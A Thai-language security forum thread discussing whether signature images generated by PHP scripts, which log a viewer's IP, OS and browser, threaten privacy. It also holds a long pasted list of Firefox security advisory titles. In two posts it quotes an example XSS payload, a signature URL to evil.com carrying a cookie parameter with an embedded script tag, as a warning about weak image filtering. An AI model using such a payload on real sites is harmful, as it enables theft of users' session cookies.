Results 1 to 8 of 8

Thread: คิดยังงัยกับ "การใช้สคริปอ่าน IP เป็น Signature" ของ Thaiadmin

  1. #1
    Senior Member
    Join Date
    Oct 2006
    Location
    thailand
    Posts
    182


    ผมอ่านกระทุ้นี้มานานแล้ว http://xxx.thaiadmin.org/board/index.php?t...63203#msg263203 และ http://xxx.thaiadmin.org/board/index.php?topic=4231.0;all

    โดยส่วนตัวไม่ค่อยชอบการแสดงความคิดเห็นในกระทู้นั้น (ในทำนองดูถู) จริงๆ มันก็น่ากังวลเหมือนกันกับผู้ที่แจ้งนั้นเรื่องการแอบเก็บ ip และรายละเอียดอื่นๆ ของผู้เข้าใช้งาน เพราะว่ามันเป็น php script มันก็ทำอะไรได้ทั้งนั้น (อยู่ที่ผู้สร้างมัน) แม้ว่าบอร์ดนั้นๆ จะป้องกันโดยการบังคับให้ใสได้เฉพาะรูปภาพ (jpg, gif,pnp...) ก็ตาม ก็ยังสามารถทำได้อยู่ดี วันนี้จะทำ POC มาให้ดูว่าทำได้ยังงัย

    **Hidden Content: To see this hidden content your post count must be 30 or greater.**

  2. #2
    Administrator asylu3's Avatar
    Join Date
    Jun 2000
    Location
    Thailand
    Posts
    3,557


    script ลักษณะนี้ ผมมองว่าเป็นของเล่นเท่านั้น
    เพราะถึงแม้ไม่ใช้ Script พวกนี้ ระบบ Web Server ก็เก็บข้อมูลพวกนี้ไปใช้ได้อยู่แล้ว
    (CITEC เราก็เก็บ) ยิ่งไปกว่านั้นระบบนับสถิติบางตัวก็รู้มากกว่านั้นด้วยเจาะจงเป็น IP ของเข้าชม

    - IP อะไร
    - OS อะไร
    - Browser อะไร
    - รู้ทั้งทางเข้าทางออกเว็บ
    - เวลาที่ใช้ดูเว็บ
    - Keyword ที่ Search เว็บเจอ
    - เปิดจากหน้าไหนไปไหน
    - เข้าออกกี่ครั้งต่อวัน


    อยากเข้าไปดูของจริงก็ลองเข้าไปดูที่นี้นะครับ
    http://truehits.net/stat.php?login=CITEC
    ไม่ปิดบัง

    และถ้าเข้าใจไม่ผิดจากกรณี script นี้มันจะเห็นเฉพาะตัวเราเท่านั้นคนอื่นที่ท่องเว็บด้วยกันจะไม่ทราบ
    นอกนั้น คนอื่นที่จะรู้่ข้อมูลนี้ก็คือ เจ้าของเว็บซึ่ง มีไม่มีเขาก็ทราบอยู่แล้ว
    ข้อมูลพวกนี้ เอาไปใช้ประโยชน์อย่างมากก็คือใช้ในภาพรวมในการวิเคาราะห์ แนวทางการตลาดของเว็บ

    ไม่คิดว่าจะมีผลกระทบร้ายแรงใดๆ ทั้งนี้หากจะมีอันตรายในเรื่อง XSS หรือเปล่านั้น
    คิดว่าอาจจะพอมีเค้าลางบ้าง แต่ก็ยังไม่ชัดเจนเพราะยังไม่เห็น Prove of Concept จริง (ถ้าทำได้ก็ช่วยนำเสนอด้วย)

    แต่อย่างน้อยก็อุ่นใจอย่างนึงว่าหากเราใช้ Browser ที่ดีัเช่น Firefox ที่คอย Update security เหล่านี้สม่ำเสมอแล้วละก็สามารถคลายความกังวลได้เยอะเลยดูจาก List นี้แล้วก็คงทราบดูครับว่า Firefox ให้ความสำคัญเรื่องนี้ขนาดไหนเรื่อง XSS ดังกล่าวโอกาสเกิดน้อยมาก หากเข้าเว็บที่น่าเชื่อถือพร้อมกับ Browser ดี



    Fixed in Firefox 2.0.0.12
    MFSA 2008-11 Web forgery overwrite with div overlay
    MFSA 2008-10 URL token stealing via stylesheet redirect
    MFSA 2008-09 Mishandling of locally-saved plain text files
    MFSA 2008-08 File action dialog tampering
    MFSA 2008-06 Web browsing history and forward navigation stealing
    MFSA 2008-05 Directory traversal via chrome: URI
    MFSA 2008-04 Stored password corruption
    MFSA 2008-03 Privilege escalation, XSS, Remote Code Execution
    MFSA 2008-02 Multiple file input focus stealing vulnerabilities
    MFSA 2008-01 Crashes with evidence of memory corruption (rv:1.8.1.12)
    Fixed in Firefox 2.0.0.11
    Firefox 2.0.0.11 fixed a bug introduced by the 2.0.0.10 update in the <canvas> feature that affected some web pages and extensions. There were no security-related fixes in this release.
    Fixed in Firefox 2.0.0.10
    MFSA 2007-39 Referer-spoofing via window.location race condition
    MFSA 2007-38 Memory corruption vulnerabilities (rv:1.8.1.10)
    MFSA 2007-37 jar: URI scheme XSS hazard
    Fixed in Firefox 2.0.0.9
    Firefox 2.0.0.9 fixed a small number of rendering bugs introduced by the 2.0.0.8 release; there were no security fixes.
    Fixed in Firefox 2.0.0.8
    MFSA 2007-36 URIs with invalid %-encoding mishandled by Windows
    MFSA 2007-35 XPCNativeWrapper pollution using Script object
    MFSA 2007-34 Possible file stealing through sftp protocol
    MFSA 2007-33 XUL pages can hide the window titlebar
    MFSA 2007-32 File input focus stealing vulnerability
    MFSA 2007-31 Browser digest authentication request splitting
    MFSA 2007-30 onUnload Tailgating
    MFSA 2007-29 Crashes with evidence of memory corruption (rv:1.8.1.8)
    Fixed in Firefox 2.0.0.7
    MFSA 2007-28 Code execution via QuickTime Media-link files
    Fixed in Firefox 2.0.0.6
    MFSA 2007-27 Unescaped URIs passed to external programs
    MFSA 2007-26 Privilege escalation through chrome-loaded about:blank windows
    Fixed in Firefox 2.0.0.5
    MFSA 2007-25 XPCNativeWrapper pollution
    MFSA 2007-24 Unauthorized access to wyciwyg:// documents
    MFSA 2007-23 Remote code execution by launching Firefox from Internet Explorer
    MFSA 2007-22 File type confusion due to %00 in name
    MFSA 2007-21 Privilege escalation using an event handler attached to an element not in the document
    MFSA 2007-20 Frame spoofing while window is loading
    MFSA 2007-19 XSS using addEventListener and setTimeout
    MFSA 2007-18 Crashes with evidence of memory corruption (rv:1.8.1.5)
    Fixed in Firefox 2.0.0.4
    MFSA 2007-17 XUL Popup Spoofing
    MFSA 2007-16 XSS using addEventListener
    MFSA 2007-14 Path Abuse in Cookies
    MFSA 2007-13 Persistent Autocomplete Denial of Service
    MFSA 2007-12 Crashes with evidence of memory corruption (rv:1.8.0.12/1.8.1.4)
    Fixed in Firefox 2.0.0.3
    MFSA 2007-11 FTP PASV port-scanning
    Fixed in Firefox 2.0.0.2
    MFSA 2007-09 Privilege escalation by setting img.src to java script: URI
    MFSA 2007-08 onUnload + document.write() memory corruption
    MFSA 2007-07 Embedded nulls in location.hostname confuse same-domain checks
    MFSA 2007-06 Mozilla Network Security Services (NSS) SSLv2 buffer overflow
    MFSA 2007-05 XSS and local file access by opening blocked popups
    MFSA 2007-04 Spoofing using custom cursor and CSS3 hotspot
    MFSA 2007-03 Information disclosure through cache collisions
    MFSA 2007-02 Improvements to help protect against Cross-Site Scripting attacks
    MFSA 2007-01 Crashes with evidence of memory corruption (rv:1.8.0.10/1.8.1.2)
    Fixed in Firefox 2.0.0.1
    MFSA 2006-76 XSS using outer window&#39;s Function object
    MFSA 2006-75 RSS Feed-preview referrer leak
    MFSA 2006-73 Mozilla SVG Processing Remote Code Execution
    MFSA 2006-72 XSS by setting img.src to java script: URI
    MFSA 2006-71 LiveConnect crash finalizing JS objects
    MFSA 2006-70 Privilege escalation using watch point
    MFSA 2006-69 CSS cursor image buffer overflow (Windows only)
    MFSA 2006-68 Crashes with evidence of memory corruption (rv:1.8.0.9/1.8.1.1)
    Firefox logoFirefox 1.5
    Firefox 1.5 is no longer supported and the last update, Firefox 1.5.0.12, is affected by several vulnerabilities fixed in newer versions of the program. All users are urged to upgrade to the newest version of Firefox.
    Fixed in Firefox 1.5.0.12
    MFSA 2007-17 XUL Popup Spoofing
    MFSA 2007-16 XSS using addEventListener
    MFSA 2007-14 Path Abuse in Cookies
    MFSA 2007-13 Persistent Autocomplete Denial of Service
    MFSA 2007-12 Crashes with evidence of memory corruption (rv:1.8.0.12/1.8.1.4)
    Fixed in Firefox 1.5.0.11
    MFSA 2007-11 FTP PASV port-scanning
    Fixed in Firefox 1.5.0.10
    MFSA 2007-09 Privilege escalation by setting img.src to java script: URI
    MFSA 2007-08 onUnload + document.write() memory corruption
    MFSA 2007-07 Embedded nulls in location.hostname confuse same-domain checks
    MFSA 2007-06 Mozilla Network Security Services (NSS) SSLv2 buffer overflow
    MFSA 2007-05 XSS and local file access by opening blocked popups
    MFSA 2007-04 Spoofing using custom cursor and CSS3 hotspot
    MFSA 2007-03 Information disclosure through cache collisions
    MFSA 2007-02 Improvements to help protect against Cross-Site Scripting attacks
    MFSA 2007-01 Crashes with evidence of memory corruption (rv:1.8.0.10/1.8.1.2)
    Fixed in Firefox 1.5.0.9
    MFSA 2006-73 Mozilla SVG Processing Remote Code Execution
    MFSA 2006-72 XSS by setting img.src to java script: URI
    MFSA 2006-71 LiveConnect crash finalizing JS objects
    MFSA 2006-70 Privilege escalation using watch point
    MFSA 2006-69 CSS cursor image buffer overflow (Windows only)
    MFSA 2006-68 Crashes with evidence of memory corruption (rv:1.8.0.9/1.8.1.1)
    Fixed in Firefox 1.5.0.8
    MFSA 2006-67 Running Script can be recompiled
    MFSA 2006-66 RSA signature forgery (variant)
    MFSA 2006-65 Crashes with evidence of memory corruption (rv:1.8.0.8)
    Fixed in Firefox 1.5.0.7
    MFSA 2006-64 Crashes with evidence of memory corruption (rv:1.8.0.7)
    MFSA 2006-62 Popup-blocker cross-site scripting (XSS)
    MFSA 2006-61 Frame spoofing using document.open()
    MFSA 2006-60 RSA Signature Forgery
    MFSA 2006-59 Concurrency-related vulnerability
    MFSA 2006-58 Auto-Update compromise through DNS and SSL spoofing
    MFSA 2006-57 JavaScript Regular Expression Heap Corruption
    Fixed in Firefox 1.5.0.5
    MFSA 2006-56 chrome: scheme loading remote content
    MFSA 2006-55 Crashes with evidence of memory corruption (rv:1.8.0.5)
    MFSA 2006-54 XSS with XPCNativeWrapper(window).Function(...)
    MFSA 2006-53 UniversalBrowserRead privilege escalation
    MFSA 2006-52 PAC privilege escalation using Function.prototype.call
    MFSA 2006-51 Privilege escalation using named-functions and redefined "new Object()"
    MFSA 2006-50 JavaScript engine vulnerabilities
    MFSA 2006-48 JavaScript new Function race condition
    MFSA 2006-47 Native DOM methods can be hijacked across domains
    MFSA 2006-46 Memory corruption with simultaneous events
    MFSA 2006-45 Javascript navigator Object Vulnerability
    MFSA 2006-44 Code execution through deleted frame reference
    Fixed in Firefox 1.5.0.4
    MFSA 2006-43 Privilege escalation using addSelectionListener
    MFSA 2006-42 Web site XSS using BOM on UTF-8 pages
    MFSA 2006-41 File stealing by changing input type (variant)
    MFSA 2006-39 "View Image" local resource linking (Windows)
    MFSA 2006-38 Buffer overflow in crypto.signText()
    MFSA 2006-37 Remote compromise via content-defined setter on object prototypes
    MFSA 2006-36 PLUGINSPAGE privileged JavaScript execution 2
    MFSA 2006-35 Privilege escalation through XUL persist
    MFSA 2006-34 XSS viewing java script: frames or images from context menu
    MFSA 2006-33 HTTP response smuggling
    MFSA 2006-32 Fixes for crashes with potential memory corruption (rv:1.8.0.4)
    MFSA 2006-31 EvalInSandbox escape (Proxy Autoconfig, Greasemonkey)
    Fixed in Firefox 1.5.0.3
    MFSA 2006-30 Deleted object reference when designMode="on"
    Fixed in Firefox 1.5.0.2
    MFSA 2006-29 Spoofing with translucent windows
    MFSA 2006-28 Security check of js_ValueToFunctionObject() can be circumvented
    MFSA 2006-27 Table Rebuilding Code Execution Vulnerability
    MFSA 2006-25 Privilege escalation through Print Preview
    MFSA 2006-24 Privilege escalation using crypto.generateCRMFRequest
    MFSA 2006-23 File stealing by changing input type
    MFSA 2006-22 CSS Letter-Spacing Heap Overflow Vulnerability
    MFSA 2006-20 Crashes with evidence of memory corruption (rv:1.8.0.2)
    Fixed in Firefox 1.5.0.1
    MFSA 2006-08 "AnyName" entrainment and access control hazard
    MFSA 2006-07 Read beyond buffer while parsing XML
    MFSA 2006-06 Integer overflows in E4X, SVG and Canvas
    MFSA 2006-05 Localstore.rdf XML injection through XULDocument.persist()
    MFSA 2006-04 Memory corruption via QueryInterface on Location, Navigator objects
    MFSA 2006-03 Long document title causes startup denial of Service
    MFSA 2006-02 Changing position:relative to static corrupts memory
    MFSA 2006-01 JavaScript garbage-collection hazards
    Fixed in Firefox 1.5
    MFSA 2006-19 Cross-site scripting using .valueOf.call()
    MFSA 2006-18 Mozilla Firefox Tag Order Vulnerability
    MFSA 2006-17 cross-site scripting through window.controllers
    MFSA 2006-16 Accessing XBL compilation scope via valueOf.call()
    MFSA 2006-15 Privilege escalation using a JavaScript function&#39;s cloned parent
    MFSA 2006-14 Privilege escalation via XBL.method.eval
    MFSA 2006-13 Downloading executables with "Save Image As..."
    MFSA 2006-12 Secure-site spoof (requires security warning dialog)
    MFSA 2006-11 Crashes with evidence of memory corruption (rv:1.8)
    MFSA 2006-10 JavaScript garbage-collection hazard audit
    MFSA 2006-09 Cross-site JavaScript injection using event handlers
    Firefox 1.0
    Firefox 1.0 is no longer supported and the last update, Firefox 1.0.8, is affected by several vulnerabilities fixed in newer versions of the program. All users are urged to upgrade to the newest version of Firefox.
    Fixed in Firefox 1.0.8
    MFSA 2006-27 Table Rebuilding Code Execution Vulnerability
    MFSA 2006-25 Privilege escalation through Print Preview
    MFSA 2006-24 Privilege escalation using crypto.generateCRMFRequest
    MFSA 2006-23 File stealing by changing input type
    MFSA 2006-22 CSS Letter-Spacing Heap Overflow Vulnerability
    MFSA 2006-19 Cross-site scripting using .valueOf.call()
    MFSA 2006-18 Mozilla Firefox Tag Order Vulnerability
    MFSA 2006-17 cross-site scripting through window.controllers
    MFSA 2006-16 Accessing XBL compilation scope via valueOf.call()
    MFSA 2006-15 Privilege escalation using a JavaScript function&#39;s cloned parent
    MFSA 2006-14 Privilege escalation via XBL.method.eval
    MFSA 2006-13 Downloading executables with "Save Image As..."
    MFSA 2006-12 Secure-site spoof (requires security warning dialog)
    MFSA 2006-11 Crashes with evidence of memory corruption (rv:1.8)
    MFSA 2006-10 JavaScript garbage-collection hazard audit
    MFSA 2006-09 Cross-site JavaScript injection using event handlers
    MFSA 2006-05 Localstore.rdf XML injection through XULDocument.persist()
    MFSA 2006-03 Long document title causes startup denial of Service
    MFSA 2006-01 JavaScript garbage-collection hazards
    Fixed in Firefox 1.0.7
    MFSA 2005-59 Command-line handling on Linux allows shell execution
    MFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12 Vulnerability Fixes
    MFSA 2005-57 IDN heap overrun using soft-hyphens
    Fixed in Firefox 1.0.5/1.0.6
    MFSA 2005-56 Code execution through shared function objects
    MFSA 2005-55 XHTML node spoofing
    MFSA 2005-54 Javascript prompt origin spoofing
    MFSA 2005-53 Standalone applications can run arbitrary code through the browser
    MFSA 2005-52 Same origin violation: frame calling top.focus()
    MFSA 2005-51 The return of frame-injection spoofing
    MFSA 2005-50 Exploitable crash in InstallVersion.compareTo()
    MFSA 2005-49 Script injection from Firefox sidebar panel using data:
    MFSA 2005-48 Same-origin violation with InstallTrigger callback
    MFSA 2005-47 Code execution via "Set as Wallpaper"
    MFSA 2005-46 XBL scripts ran even when Javascript disabled
    MFSA 2005-45 Content-generated event vulnerabilities
    Fixed in Firefox 1.0.4
    MFSA 2005-44 Privilege escalation via non-DOM property overrides
    MFSA 2005-43 "Wrapped" java script: urls bypass security checks
    MFSA 2005-42 Code execution via java script: IconURL
    Fixed in Firefox 1.0.3
    MFSA 2005-33 Javascript "lambda" replace exposes memory contents
    MFSA 2005-34 java script: PLUGINSPAGE code execution
    MFSA 2005-35 Showing blocked java script: popup uses wrong privilege context
    MFSA 2005-36 Cross-site scripting through global scope pollution
    MFSA 2005-37 Code execution through java script: favicons
    MFSA 2005-38 Search plugin cross-site scripting
    MFSA 2005-39 Arbitrary code execution from Firefox sidebar panel II
    MFSA 2005-40 Missing Install object instance checks
    MFSA 2005-41 Privilege escalation via DOM property overrides
    Fixed in Firefox 1.0.2
    MFSA 2005-32 Drag and drop loading of privileged XUL
    MFSA 2005-31 Arbitrary code execution from Firefox sidebar panel
    MFSA 2005-30 GIF heap overflow parsing Netscape extension 2
    Fixed in Firefox 1.0.1
    MFSA 2005-29 Internationalized Domain Name (IDN) homograph spoofing
    MFSA 2005-28 Unsafe /tmp/plugtmp directory exploitable to erase user&#39;s files
    MFSA 2005-27 Plugins can be used to load privileged content
    MFSA 2005-26 Cross-site scripting by dropping java script: link on tab
    MFSA 2005-25 Image drag and drop executable spoofing
    MFSA 2005-24 HTTP auth prompt tab spoofing
    MFSA 2005-23 Download dialog source spoofing
    MFSA 2005-22 Download dialog spoofing using Content-Disposition header
    MFSA 2005-21 Overwrite arbitrary files downloading .lnk twice
    MFSA 2005-20 XSLT can include stylesheets from arbitrary hosts
    MFSA 2005-19 Autocomplete data leak
    MFSA 2005-18 Memory overwrite in string library
    MFSA 2005-17 Install source spoofing with userass@host
    MFSA 2005-16 Spoofing download and security dialogs with overlapping windows
    MFSA 2005-15 Heap overflow possible in UTF8 to Unicode conversion
    MFSA 2005-14 SSL "secure site" indicator spoofing
    MFSA 2005-13 Window Injection Spoofing
    Fixed in Firefox 1.0
    MFSA 2005-12 java script: Livefeed bookmarks can steal private data
    MFSA 2005-09 Browser responds to proxy auth request from non-proxy ssl server
    MFSA 2005-08 Synthetic middle-click event can steal clipboard contents
    MFSA 2005-07 Script-generated event can download content without prompting
    MFSA 2005-05 Input stealing from other tabs
    MFSA 2005-04 Secure site lock can be spoofed using view-source:
    MFSA 2005-03 Secure site lock can be spoofed by a binary download
    MFSA 2005-02 Opened attachments are temporarily saved world-readable
    MFSA 2005-01 Link opened in new tab can load local file
    [/b]
    Reference: http://www.mozilla.org/projects/security/k...firefox2.0.0.12

  3. #3
    Senior Member
    Join Date
    Oct 2006
    Location
    thailand
    Posts
    182


    และถ้าเข้าใจไม่ผิดจากกรณี script นี้มันจะเห็นเฉพาะตัวเราเท่านั้นคนอื่นที่ท่องเว็บด้วยกันจะไม่ทราบ
    นอกนั้น คนอื่นที่จะรู้่ข้อมูลนี้ก็คือ เจ้าของเว็บซึ่ง มีไม่มีเขาก็ทราบอยู่แล้ว
    ข้อมูลพวกนี้ เอาไปใช้ประโยชน์อย่างมากก็คือใช้ในภาพรวมในการวิเคาราะห์ แนวทางการตลาดของเว็บ [/b]
    ในความหมายของผมนั้น ไม่ได้หมายถึงเจ้าของเว็บที่จะรู้ข้อมูลพวกนี้ (เพราะเขาต้องรู้อยู่แล้ว) แต่ผมหมายถึงคนที่เอา script นี้ไปใช้จะทำให้เขารู้ว่า ip ไหนบ้างมา้เข้าหน้านี้ เขาจะเอาข้อมูลนี้ไปทำอะไรต่อนั้นเราก็ไม่ทราบได้

    ส่วนเรื่องของ XSS นั้น หากไม่มีการ filter ที่ดีก็โดนได้เหมือนกัน เช่น หากยอมให้ signature ที่เป็น dynamic url เช่น http://www.evil.com/pic.jpg?cookie=<sc...</script> แค่ดูว่าเป็น jpg, gif,png อยากเดียวไม่พอ

  4. #4
    Senior Member
    Join Date
    Jul 2004
    Location
    Thailand
    Posts
    211



    คนทุกคน ไม่ได้เก่ง computer บางคนก็คงตกใจ ว่าขอมูลตัวเองจะโดน ขโมยหรือเปล่า

    แต่ใน thaiadmin บางคนก็พูดกันแรงเกิน ... <_<

  5. #5
    Administrator asylu3's Avatar
    Join Date
    Jun 2000
    Location
    Thailand
    Posts
    3,557


    ในความหมายของผมนั้น ไม่ได้หมายถึงเจ้าของเว็บที่จะรู้ข้อมูลพวกนี้ (เพราะเขาต้องรู้อยู่แล้ว) แต่ผมหมายถึงคนที่เอา script นี้ไปใช้จะทำให้เขารู้ว่า ip ไหนบ้างมา้เข้าหน้านี้ เขาจะเอาข้อมูลนี้ไปทำอะไรต่อนั้นเราก็ไม่ทราบได้

    ส่วนเรื่องของ XSS นั้น หากไม่มีการ filter ที่ดีก็โดนได้เหมือนกัน เช่น หากยอมให้ signature ที่เป็น dynamic url เช่น http://www.evil.com/pic.jpg?cookie=<sc...</script> แค่ดูว่าเป็น jpg, gif,png อยากเดียวไม่พอ[/b]
    ยังไงก็ยังถือว่าเป็นความเสี่ยงที่มีโอกาสเกิดน้อยมากนะครับ
    ถึงแม้ในกรณี XSS ก็เถอะมัน ไม่ใช่ความผิดของ script แต่เป็นความผิดของระบบ Webboard เองมากกว่าที่
    ยอมให้ใส่ Tag แบบนั้น ซึ่งต้องแก้ที่ Webboard คนละประเด็นกับตัว Script นี้

    ตัว script ที่อ้างถึงตัวดั่งเดิมนั้นนั้นผมก็ยังมองว่า Risk ต่ำมาก
    ต่อให้รู้ว่าไปหน้าเว็บไหนมันก็ต้องเอาติดทุกๆหน้า Post ทุกๆหน้าซึ่งเป็นไปไม่ได้แน่ ยิ่งไปกว่านั้น IP ที่ได้เป็นของ Guest หรือ Member คนไหนก็ระบุตัวไม่ได้ แทบจะใช้ประโยชน์ตรงๆไม่ได้เลย เป็นได้อย่างมากแค่การเก็บข้อมูลเท่านั้นครับ Risk ต่ำมากๆ

    อย่างไรก็ดีประโยชน์อย่างนึงของกระทู้นี้คือให้ผู้ใช้งาน internet ได้ทราบถึงความเป็นไปได้ที่จะ Hack ด้วยวิธีต่าง
    นับว่าเป็นจุดที่น่าสนใจที่ผู้ใช้ Internet ควรให้ความสนใจ แต่ก็ควรตั้งอยู่บทหลักการและเหตุผลที่เหมาะสม
    ไม่ตรึงหรือหย่อนจนเกินไป ความคิดเห็นของผมนั้นไม่ได้เป็นการโต้แย้งหรือบอกว่าคุณผิดหรือผมถูก แต่คือการร่วมแสดงความคิดเห็นในมุมมอง
    ของแต่ฝ่าย เพื่อให้ได้ข้อเท็จจริง ให้มากที่สุดเท่านั้นเอง

  6. #6
    Senior Member
    Join Date
    Oct 2006
    Location
    thailand
    Posts
    182


    ดีครับ ผมเองก็ต้องการ ความคิดเห็นเช่นกันครับ

  7. #7
    Junior Member
    Join Date
    Nov 2009
    Posts
    10


    ตกลงsignที่โชว์ข้อมูลของเรา คนอื่นนอกจากเจ้าของเว็บจะไม่สามารถเห็นได้ใช่มั้ยครับ หรือผมเข้าใจผิด
    ประมาณว่ารูปนั้นทำขึ้นมาเพื่อให้เราเห็นโดยเฉพาะ หรือยังไง?
    ขอบคุณครับ

  8. #8
    Senior Member retool2's Avatar
    Join Date
    Aug 2008
    Location
    Under Relocation
    Posts
    178


    กระทู้เก่ายังไปขุดมาตอบกันผมละเหนื่อยจริง
    เข้ามาเพื่อให้หายสงสัยแล้วกันครับ
    Quote Originally Posted by lanstroke View Post
    ตกลงsignที่โชว์ข้อมูลของเรา คนอื่นนอกจากเจ้าของเว็บจะไม่สามารถเห็นได้ใช่มั้ยครับ หรือผมเข้าใจผิด
    ประมาณว่ารูปนั้นทำขึ้นมาเพื่อให้เราเห็นโดยเฉพาะ หรือยังไง?
    ขอบคุณครับ
    ข้อมูลที่เราเข้าเวบนั้นคนที่รู้มีดังนี้
    1 เครื่องเราเอง
    2 ISP ที่เราใช้งาน(มีการเก็บข้อมูลตาม พรบ)
    3 server ที่ตั้งเวบ ถ้าในไทยก็ต้องมีเก็บ apache มี access.log (ก็ตาม พรบอีกนั่นแหละ)
    4 เจ้าของเวบ อันนี้แล้วแต่อยากเก็บหรือไม่ แต่ webboard ส่วนมากจะมี log อีก

    ส่วนรูปที่เป็น signature นั้นจะมีการส่งข้อมูลไปที่เวบซึ่งให้บริการรูปทุกๆครั้งและ gen ใหม่ทุกๆครั้ง
    หมายความว่าใครที่เข้าก็จะเห็นของตัวเองเท่านั้น เมื่อคนอื่นเข้าต่อจากเราก็จะเห็นแค่ของเขาเอง ไม่เห็นของเรา

Similar Threads

  1. Replies: 0
    Last Post: 22-10-2009, 11:57 PM
  2. เปลี่ยน iPod Nano 3G เป็น"ทีวี"ขนาดจิ๋ว?
    By delacroix in forum ข่าวสารด้าน IT ใหม่ๆ
    Replies: 0
    Last Post: 08-09-2009, 08:17 AM
  3. Replies: 0
    Last Post: 21-06-2009, 09:48 PM
  4. Replies: 0
    Last Post: 26-03-2009, 09:19 PM
  5. Steroid bust shows Feds can still get at "private" and "secure" e-mail
    By newsbot in forum World Hacking/Security News
    Replies: 0
    Last Post: 10-11-2007, 04:08 PM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •